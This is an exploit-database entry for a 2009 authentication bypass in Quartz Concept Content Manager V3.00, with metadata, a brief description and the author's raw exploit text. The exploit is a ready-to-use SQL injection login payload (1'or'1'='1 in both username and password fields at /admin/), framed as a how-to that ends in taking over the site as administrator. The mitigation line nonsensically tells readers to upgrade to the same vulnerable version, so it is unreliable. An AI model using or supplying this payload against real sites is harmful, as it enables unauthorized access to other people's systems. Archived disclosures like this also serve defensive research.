header-logo
Suggest Exploit
vendor:
Quartz Concept Content Manager
by:
Mr.aFiR
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Quartz Concept Content Manager
Affected Version From: V3.00
Affected Version To: V3.00
Patch Exists: Yes
Related CWE: N/A
CPE: a:quartz_concept:quartz_concept_content_manager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Quartz Concept Content Manager V3.00 Authentication Bypass

Quartz Concept Content Manager V3.00 is vulnerable to an authentication bypass vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This will allow the attacker to bypass authentication and gain access to the application as an administrator.

Mitigation:

Upgrade to the latest version of Quartz Concept Content Manager V3.00
Source

Exploit-DB raw data:

#####################################################################
// Exploit Begin.
#####################################################################
##                                _______   ____                   ##
##          __ ___               / _____ \ /  __ \                 ##
##         /      \  _ _     ___ | |___ |/ | |  ) )                ##
##        |  Y  Y  \| V_\   / _ Y|  __ |(_)| |_/ /      [A]        ##
##        |__|__|__ \ |  ()| (_] | |  \|| ||  __ \                 ##
##                 \/_/     \___ | |    | || |  ) |                ##
##                              \|/     |_/|_/  |/                 ##
##                                                                 ##
#####################################################################
##          :: Quartz Concept Content Manager V3.00 ::             ##
##                          Auth Bypass                            ##
##             Created By Mr.aFiR (Moroccan Hacker)                ##
##                    Email: q-_@hotmail.com                       ##
##                     Website: www.aFiR.me                        ##
##                      (c) -- 14/12/2oo9                          ##
#####################################################################
##                      * How to use it ?                          ##
##                      -----------------                          ##
## ~ Go to : > http://site/admin/                                  ##
##           > Login : Username = 1'or'1'='1                       ##
##                     Password = 1'or'1'='1                       ##
##                                                                 ##
##           > Enjoy! You're the administrator of website !        ##
##                                                                 ##
#####################################################################
## ~ GreatZ To : > Dr.Crypter - Dr.BoB-Hacker - Love511 & All ...  ##
## ~ Contact   : > q-_[at]Hotmail[dot]com - www[dot]aFiR[dot]me    ##
##                        I Love You ****                          ##
#####################################################################

© aFiR.Me - 0nly F0r Security 2009 | By Mr.aFiR

// Exploit End.